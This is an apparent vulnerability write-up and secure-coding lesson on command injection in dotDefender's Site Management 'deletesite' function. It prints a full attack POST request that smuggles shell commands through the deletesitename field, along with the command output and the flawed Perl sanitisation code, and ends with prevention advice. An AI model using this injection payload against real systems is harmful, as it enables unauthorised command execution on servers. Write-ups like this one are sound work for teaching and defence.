* What the problem is
dotDefender (http://applicure.com)
is a web appliaction firewall (WAF) which 'prevents hackers from attacking your
website.'
The Site Management application of dotDefender is reachable as a web application
(https://[sitename]/dotDefender/) on the webserver. After passing the Basic Authentication
login, you can create/delete applications using dotDefender. The mentioned vulnerability
is in the 'deletesite' implementation and the 'deletesitename' variable. Insufficient
input validation allows an attacker to inject arbitrary commands.
Normal Delete Site Command:
POST /dotDefender/index.cgi HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;rv:1.9.1.5) Gecko/20091102
Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://172.16.159.132/dotDefender/index.cgi
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14
An attack (request):
POST /dotDefender/index.cgi HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102
Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://172.16.159.132/dotDefender/index.cgi
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15
Response to the attack request:
[...]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin
[...]
Vulnerable Codes:
The vulnerability originated in the cleanIt function in applicure-lib2.pl.
This function was referenced in index1.cgi of the admin interface:
applicure-lib2.pl code snippet:
13 sub cleanIt {
14 my($param,$type)=@_;
15
16 $param =~ s/%([a-fA-F0-9]{2})/pack
"H2", $1/eg;
17 if ($type eq 'any') {
18 } elsif ($type eq 'filter') {
19 $param =~ s/\+/" "/eg;
20 } elsif ($type eq 'path') {
21 $param = un_urlize($param);
22 #$param
=~ s/([^A-Za-z0-9\-_.\/~'])//g;
23 #$param
=~ s/\+/" "/eg;
24 } else {
25 $param
=~ s/([^A-Za-z0-9\-_.~'])//g;
26 }
27 return $param;
28 }
index1.cgi code snippet:
311
312 }elsif($action eq "deletesite") {
# delete site
313 $deletesitename=$postFields{"deletesitename"};
314 $dots_index = index($deletesitename,"%3A");
315
316 if($dots_index != -1 ) {
317 $site_a_part=
substr($deletesitename,0,$dots_index);
318 $site_b_part=
substr($deletesitename,$dots_index+3,length($deletesitename)-$dots_index-2);
319 $site_a_part=&cleanIt($site_a_part);
320 $site_b_part=&cleanIt($site_b_part);
321 $deletesitename
= $site_a_part.":".$site_b_part;
322 }
323
324 $linenum=$postFields{'linenum'};
325 applyDbAudit($action);
326 &delline($linenum,2);
327 cleanSiteFingerPrints($deletesitename);
328
329 &deleteSiteConf($deletesitename);
330 $site_params="$CTMP_DIR/".$deletesitename."_params";
331 system("rm -f $site_params");
* What could have prevented it?
A closer look at index1.cfi reveals that a system call is being made at the
end of the code snippet listed above. Such a system call code input, if not properly
sanitized, can allow the users to insert malicious codes that may exploit the host
system.
The cleanIt function called in index1.cgi is defined in applicure-lib2.pl (as listed
above). The purpose of the cleanIt function is to sanitize the variables passed
to it. Incidentally, one of those variables is the sitename that the client can
pass as a parameter to deletesite command. Here, one can see that certain shell control
characters are not protected by the call to cleanIt. Thus an attacker can gain control
of the system call in line 331 of index1.cgi via the deletesite command as demonstrated
above.
It is clear that a simple oversight in the user input sanitization lead to possibly
opening a
portal for major attack to the system. The prevention to such attack is, therefore,
begins with identifying all the sources of user input (important) and then sanitizing each
source in context of where such inputs are being used. In this specific case, the
programmer did not check against the ";" character in the user input.
User input should always be validated.
* References
Bugtraq: Remote Command Execution in dotDefender Site Management
dotDefender: About dotDefender
securecoding.cert.org: Always Validate User Input
|